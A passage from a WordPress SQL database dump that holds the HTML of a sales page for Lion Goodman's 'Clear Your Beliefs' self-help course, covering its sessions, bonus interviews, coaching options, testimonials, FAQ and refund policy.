src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:38:36', '2014-06-18 01:38:36', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(989, 2, '2014-06-17 20:42:14', '2014-06-18 01:42:14', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that 